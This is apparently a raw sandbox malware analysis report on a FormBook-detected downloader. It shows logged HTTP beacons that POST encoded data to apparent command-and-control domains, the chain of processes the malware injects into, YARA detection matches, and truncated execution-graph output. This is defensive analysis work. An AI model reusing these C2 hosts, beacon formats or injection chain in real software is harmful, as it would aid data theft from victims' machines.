                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4e 32 5a 6c 34 48 5a 54 4e 76 53 51 4c 30 58 4d 6d 43 51 63 34 6d 4d 75 30 32 7a 4b 39 65 2b 6d 6f 6f 4b 42 34 78 54 49 65 2f 44 55 54 37 65 57 56 61 76 57 4b 6e 73 35 4a 4d 31 51 79 51 53 59 35 36 2f 67 4c 42 43 4b 4d 72 64 39 44 4a 5a 62 65 6e 6a 4f 77 78 39 36 65 6e 77 55 62 62 33 68 72 4f 4f 57 2f 6a 51 59 31 2b 54 67 76 6f 49 34 4f 38 72 55 70 49 79 6b 44 39 66 35 73 66 62 62 56 75 75 30 68 70 61 76 49 6c 68 36 43 4b 72 4b 79 35 30 2f 6e 64 49 41 70 31 48 79 5a 70 55 52 45 47 55 58 7a 62 76 34 74 72 44 55 6b 62 4a 6a 48 69 79 2f 44 6f 4d 66 45 65 64 4a 72 35 69 4b 6c 62 6d 6f 7a 67 44 4e 71 4c 4e 61 6e 34 5a 70 35 6a 76 56 6d 67 6f 3d
                            Data Ascii: UbV=N2Zl4HZTNvSQL0XMmCQc4mMu02zK9e+mooKB4xTIe/DUT7eWVavWKns5JM1QyQSY56/gLBCKMrd9DJZbenjOwx96enwUbb3hrOOW/jQY1+TgvoI4O8rUpIykD9f5sfbbVuu0hpavIlh6CKrKy50/ndIAp1HyZpUREGUXzbv4trDUkbJjHiy/DoMfEedJr5iKlbmozgDNqLNan4Zp5jvVmgo=
                            Jul 16, 2024 07:24:55.313714027 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:55 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.44978823.105.215.248801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:57.267774105 CEST10742OUTPOST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4e 32 5a 6c 34 48 5a 54 4e 76 53 51 4c 30 58 4d 6d 43 51 63 34 6d 4d 75 30 32 7a 4b 39 65 2b 6d 6f 6f 4b 42 34 78 54 49 65 2f 4c 55 54 6f 6d 57 55 38 6e 57 4e 6e 73 35 57 38 31 52 79 51 53 4a 35 36 47 70 4c 42 66 6f 4d 70 6c 39 43 73 4e 62 56 30 37 4f 35 78 39 36 63 6e 77 58 45 72 32 37 72 4f 65 61 2f 6a 41 59 31 2b 54 67 76 75 73 34 4a 74 72 55 36 34 79 6e 55 4e 66 4c 6f 66 62 2f 56 75 57 4f 68 70 58 53 49 56 42 36 43 71 37 4b 31 4b 63 2f 73 64 49 47 71 31 48 71 5a 70 49 53 45 48 34 31 7a 62 62 65 74 70 66 55 70 74 77 5a 63 79 32 72 59 4b 6f 2b 55 63 70 2b 71 36 4b 68 6b 35 2b 51 6a 77 72 46 36 59 70 34 6f 34 30 5a 74 78 76 4f 37 48 39 54 45 35 53 79 56 51 7a 6d 73 46 56 68 59 66 73 36 53 4f 70 6b 6f 51 36 71 5a 4c 46 53 53 36 6f 39 58 50 35 54 33 78 67 46 74 47 56 6d 2b 6c 70 4d 56 6f 4f 57 4f 34 49 37 51 30 67 49 4c 36 35 7a 45 65 61 62 65 44 70 58 66 65 50 44 38 35 44 4e 67 31 67 79 54 30 4d 6d 78 44 46 6c 7a 4a 34 4e 6a 51 67 33 6a 6c 53 6a 79 70 32 59 4d 67 69 52 58 47 56 55 2b 6a [TRUNCATED]
                            Data Ascii: UbV=N2Zl4HZTNvSQL0XMmCQc4mMu02zK9e+mooKB4xTIe/LUTomWU8nWNns5W81RyQSJ56GpLBfoMpl9CsNbV07O5x96cnwXEr27rOea/jAY1+Tgvus4JtrU64ynUNfLofb/VuWOhpXSIVB6Cq7K1Kc/sdIGq1HqZpISEH41zbbetpfUptwZcy2rYKo+Ucp+q6Khk5+QjwrF6Yp4o40ZtxvO7H9TE5SyVQzmsFVhYfs6SOpkoQ6qZLFSS6o9XP5T3xgFtGVm+lpMVoOWO4I7Q0gIL65zEeabeDpXfePD85DNg1gyT0MmxDFlzJ4NjQg3jlSjyp2YMgiRXGVU+jNCnqSn6dSmWS64iEqibP3mL+v9qxCA+iRu2+WKJEX1uxwSaDaWSQJVvBhxXOSb/wcqydP/eXBKXEtVeVesCIGNw5uRCsTe9tmPzYCOdjAk2b0iDhqjym/SKq+Dv+8lChpdAQ+mw2sXseETEAzER0pUGG6Dm7s02SXVPtZQoSjOLNlOKmcHelFjFmHQMyOj7Ax7so/rEVDCYdF50xLpsaAOIT7x5AG/S5mN90y9ATuwO+JUzh+iyhybGVF38cyB9z36PDXKnrHoqU/P1qMrv555+7TqfHPCnGJx4M43LJNpF8xf+W/WbOAl7FvJwQhEKZp3k7v4ugycs5TCaw+62wIyrYntn1te8LB9CMHE/xIK7H8jrp86xI5Al6uJiR6tYO8PCoD5gUH0iscTX6YxjKCb5rjVAVImlqHLNI4G3S6fYewpaCWTKsMjHa3NQt1lxNU/9l1Ncx3bpqt6fHzBsFx427wS3Lgv2GcSqu2/6Ps0BUTIXoTuWh/okpVxG8D88TM12jYeqFPFGa18ushhQQyB3ylEAAT0QAHHVSUiPQ15+3Bund8U1SQ5H/DUiQqGd5TtTYoGqqjTOzKlYypcu0YJoXlEe/hwOMDUSY1nXWpgYSe/vofC86JMP/jU/tYLnLJ2XjUQkwaGAqwL1DcQAQRh+o20xpq1ZFT+ [TRUNCATED]
                            Jul 16, 2024 07:24:57.936101913 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:57 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.44978923.105.215.248801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:59.798352003 CEST369OUTGET /fl6s/?UbV=A0xF7xRkJcHWMje5ph9HwG4I+mL/4fGguKCb0ROeX6+MB4i3E47mIUkdVM9rjjeu+d+SM2PwCOtJO5VtZmrS2xNTeXttUbHK0PGy4AIus9DMh4I9KsOxy7U=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.3333711m14.shop
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:25:00.368628025 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:25:00 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination Port
                            53192.168.2.4497903.33.130.19080
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:25:05.837614059 CEST646OUTPOST /nbaz/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.iitaccounting.com
                            Origin: http://www.iitaccounting.com
                            Referer: http://www.iitaccounting.com/nbaz/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 46 77 6d 63 58 68 41 79 65 64 5a 7a 52 31 2f 4c 56 78 38 4b 59 4e 48 50 6c 59 56 6c 64 6c 30 70 66 33 42 64 4c 2f 36 45 69 4c 72 4a 70 46 31 66 76 47 7a 63 5a 4c 57 4d 4d 61 6f 35 4b 62 70 5a 44 54 50 68 34 68 47 30 61 79 4d 47 6e 71 39 68 42 53 34 47 63 39 47 31 4f 39 4f 51 38 6c 54 77 34 6b 73 55 2b 75 42 62 74 35 61 37 64 77 6c 78 2f 72 54 31 74 6f 5a 2f 46 31 34 36 45 65 68 47 50 6d 45 39 50 78 62 74 64 64 4c 35 54 35 35 57 54 2f 69 72 4c 65 35 6e 65 59 6a 76 73 6e 78 55 42 50 4e 36 57 44 48 61 79 73 31 34 72 6c 33 6d 4f 61 30 42 63 58 57 61 64 70 66 2b 38 4d 67 2b 4a 51 3d 3d
                            Data Ascii: UbV=FwmcXhAyedZzR1/LVx8KYNHPlYVldl0pf3BdL/6EiLrJpF1fvGzcZLWMMao5KbpZDTPh4hG0ayMGnq9hBS4Gc9G1O9OQ8lTw4ksU+uBbt5a7dwlx/rT1toZ/F146EehGPmE9PxbtddL5T55WT/irLe5neYjvsnxUBPN6WDHays14rl3mOa0BcXWadpf+8Mg+JQ==


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:01:20:57
                            Start date:16/07/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
                            Imagebase:0x880000
                            File size:1'179'136 bytes
                            MD5 hash:13C0E83573FFFEB4E951929815DAF4E1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:1
                            Start time:01:20:58
                            Start date:16/07/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
                            Imagebase:0xf40000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:5
                            Start time:01:21:23
                            Start date:16/07/2024
                            Path:C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe"
                            Imagebase:0x2b0000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:6
                            Start time:01:21:25
                            Start date:16/07/2024
                            Path:C:\Windows\SysWOW64\makecab.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\makecab.exe"
                            Imagebase:0x400000
                            File size:68'096 bytes
                            MD5 hash:00824484BE0BCE2A430D7F43CD9BABA5
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:7
                            Start time:01:21:38
                            Start date:16/07/2024
                            Path:C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe"
                            Imagebase:0x2b0000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:8
                            Start time:01:21:50
                            Start date:16/07/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff6bf500000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.9%
                              Dynamic/Decrypted Code Coverage:1.5%
                              Signature Coverage:2.9%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:160
                              execution_graph 98738 11023b0 98752 1100000 98738->98752 98740 11024b0 98755 11022a0 98740->98755 98758 11034e0 GetPEB 98752->98758 98754 110068b 98754->98740 98756 11022a9 Sleep 98755->98756 98757 11022b7 98756->98757 98759 110350a 98758->98759 98759->98754 98760 88568a 98767 885c18 98760->98767 98766 8856ba Mailbox 98779 8a0ff6 98767->98779 98769 885c2b 98770 8a0ff6 Mailbox 59 API calls 98769->98770 98771 88569c 98770->98771 98772 885632 98771->98772 98817 885a2f 98772->98817 98774 885674 98774->98766 98778 8881c1 61 API calls Mailbox 98774->98778 98776 885643 98776->98774 98824 885d20 98776->98824 98830 885bda 59 API calls 2 library calls 98776->98830 98778->98766 98780 8a0ffe 98779->98780 98782 8a1018 98780->98782 98784 8a101c std::exception::exception 98780->98784 98789 8a594c 98780->98789 98806 8a35e1 DecodePointer 98780->98806 98782->98769 98807 8a87db RaiseException 98784->98807 98786 8a1046 98808 8a8711 58 API calls _free 98786->98808 98788 8a1058 98788->98769 98790 8a59c7 98789->98790 98798 8a5958 98789->98798 98815 8a35e1 DecodePointer 98790->98815 98792 8a59cd 98816 8a8d68 58 API calls __getptd_noexit 98792->98816 98795 8a598b RtlAllocateHeap 98795->98798 98805 8a59bf 98795->98805 98797 8a59b3 98813 8a8d68 58 API calls __getptd_noexit 98797->98813 98798->98795 98798->98797 98802 8a5963 98798->98802 98803 8a59b1 98798->98803 98812 8a35e1 DecodePointer 98798->98812 98802->98798 98809 8aa3ab 58 API calls 2 library calls 98802->98809 98810 8aa408 58 API calls 7 library calls 98802->98810 98811 8a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98802->98811 98814 8a8d68 58 API calls __getptd_noexit 98803->98814 98805->98780 98806->98780 98807->98786 98808->98788 98809->98802 98810->98802 98812->98798 98813->98803 98814->98805 98815->98792 98816->98805 98818 885a40 98817->98818 98819 8be065 98817->98819 98818->98776 98831 8d6443 59 API calls Mailbox 98819->98831 98821 8be06f 98822 8a0ff6 Mailbox 59 API calls 98821->98822 98823 8be07b 98822->98823 98825 885d93 98824->98825 98829 885d2e 98824->98829 98832 885dae SetFilePointerEx 98825->98832 98827 885d56 98827->98776 98828 885d66 ReadFile 98828->98827 98828->98829 98829->98827 98829->98828 98830->98776 98831->98821 98832->98829 98833 88107d 98838 8871eb 98833->98838 98835 88108c 98869 8a2f80 98835->98869 98839 8871fb __ftell_nolock 98838->98839 98872 8877c7 98839->98872 98843 8872ba 98884 8a074f 98843->98884 98850 8877c7 59 API calls 98851 8872eb 98850->98851 98903 887eec 98851->98903 98853 8872f4 RegOpenKeyExW 98854 8becda RegQueryValueExW 98853->98854 98858 887316 Mailbox 98853->98858 98855 8bed6c RegCloseKey 98854->98855 98856 8becf7 98854->98856 98855->98858 98868 8bed7e _wcscat Mailbox __NMSG_WRITE 98855->98868 98857 8a0ff6 Mailbox 59 API calls 98856->98857 98859 8bed10 98857->98859 98858->98835 98907 88538e 98859->98907 98862 8bed38 98910 887d2c 98862->98910 98863 887b52 59 API calls 98863->98868 98865 8bed52 98865->98855 98867 883f84 59 API calls 98867->98868 98868->98858 98868->98863 98868->98867 98919 887f41 98868->98919 98956 8a2e84 98869->98956 98871 881096 98873 8a0ff6 Mailbox 59 API calls 98872->98873 98874 8877e8 98873->98874 98875 8a0ff6 Mailbox 59 API calls 98874->98875 98876 8872b1 98875->98876 98877 884864 98876->98877 98923 8b1b90 98877->98923 98880 887f41 59 API calls 98881 884897 98880->98881 98925 8848ae 98881->98925 98883 8848a1 Mailbox 98883->98843 98885 8b1b90 __ftell_nolock 98884->98885 98886 8a075c GetFullPathNameW 98885->98886 98887 8a077e 98886->98887 98888 887d2c 59 API calls 98887->98888 98889 8872c5 98888->98889 98890 887e0b 98889->98890 98891 887e1f 98890->98891 98892 8bf173 98890->98892 98947 887db0 98891->98947 98952 888189 98892->98952 98895 8872d3 98897 883f84 98895->98897 98896 8bf17e __NMSG_WRITE _memmove 98899 883f92 98897->98899 98902 883fb4 _memmove 98897->98902 98898 8a0ff6 Mailbox 59 API calls 98900 883fc8 98898->98900 98901 8a0ff6 Mailbox 59 API calls 98899->98901 98900->98850 98901->98902 98902->98898 98904 887f06 98903->98904 98906 887ef9 98903->98906 98905 8a0ff6 Mailbox 59 API calls 98904->98905 98905->98906 98906->98853 98908 8a0ff6 Mailbox 59 API calls 98907->98908 98909 8853a0 RegQueryValueExW 98908->98909 98909->98862 98909->98865 98911 887d38 __NMSG_WRITE 98910->98911 98912 887da5 98910->98912 98914 887d4e 98911->98914 98915 887d73 98911->98915 98913 887e8c 59 API calls 98912->98913 98918 887d56 _memmove 98913->98918 98955 888087 59 API calls Mailbox 98914->98955 98916 888189 59 API calls 98915->98916 98916->98918 98918->98865 98920 887f50 __NMSG_WRITE _memmove 98919->98920 98921 8a0ff6 Mailbox 59 API calls 98920->98921 98922 887f8e 98921->98922 98922->98868 98924 884871 GetModuleFileNameW 98923->98924 98924->98880 98926 8b1b90 __ftell_nolock 98925->98926 98927 8848bb GetFullPathNameW 98926->98927 98928 8848da 98927->98928 98929 8848f7 98927->98929 98930 887d2c 59 API calls 98928->98930 98931 887eec 59 API calls 98929->98931 98932 8848e6 98930->98932 98931->98932 98935 887886 98932->98935 98936 887894 98935->98936 98939 887e8c 98936->98939 98938 8848f2 98938->98883 98940 887e9a 98939->98940 98942 887ea3 _memmove 98939->98942 98940->98942 98943 887faf 98940->98943 98942->98938 98944 887fc2 98943->98944 98946 887fbf _memmove 98943->98946 98945 8a0ff6 Mailbox 59 API calls 98944->98945 98945->98946 98946->98942 98948 887dbf __NMSG_WRITE 98947->98948 98949 887dd0 _memmove 98948->98949 98950 888189 59 API calls 98948->98950 98949->98895 98951 8bf130 _memmove 98950->98951 98953 8a0ff6 Mailbox 59 API calls 98952->98953 98954 888193 98953->98954 98954->98896 98955->98918 98957 8a2e90 __setmode 98956->98957 98964 8a3457 98957->98964 98963 8a2eb7 __setmode 98963->98871 98981 8a9e4b 98964->98981 98966 8a2e99 98967 8a2ec8 DecodePointer DecodePointer 98966->98967 98968 8a2ea5 98967->98968 98969 8a2ef5 98967->98969 98978 8a2ec2 98968->98978 98969->98968 99027 8a89e4 59 API calls __mbstowcs_l_helper 98969->99027 98971 8a2f58 EncodePointer EncodePointer 98971->98968 98972 8a2f2c 98972->98968 98977 8a2f46 EncodePointer 98972->98977 99029 8a8aa4 61 API calls 2 library calls 98972->99029 98973 8a2f07 98973->98971 98973->98972 99028 8a8aa4 61 API calls 2 library calls 98973->99028 98976 8a2f40 98976->98968 98976->98977 98977->98971 99030 8a3460 98978->99030 98982 8a9e6f EnterCriticalSection 98981->98982 98983 8a9e5c 98981->98983 98982->98966 98988 8a9ed3 98983->98988 98985 8a9e62 98985->98982 99012 8a32f5 58 API calls 3 library calls 98985->99012 98989 8a9edf __setmode 98988->98989 98990 8a9ee8 98989->98990 98991 8a9f00 98989->98991 99013 8aa3ab 58 API calls 2 library calls 98990->99013 99000 8a9f21 __setmode 98991->99000 99016 8a8a5d 58 API calls 2 library calls 98991->99016 98994 8a9eed 99014 8aa408 58 API calls 7 library calls 98994->99014 98995 8a9f15 98998 8a9f2b 98995->98998 98999 8a9f1c 98995->98999 98997 8a9ef4 99015 8a32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98997->99015 99003 8a9e4b __lock 58 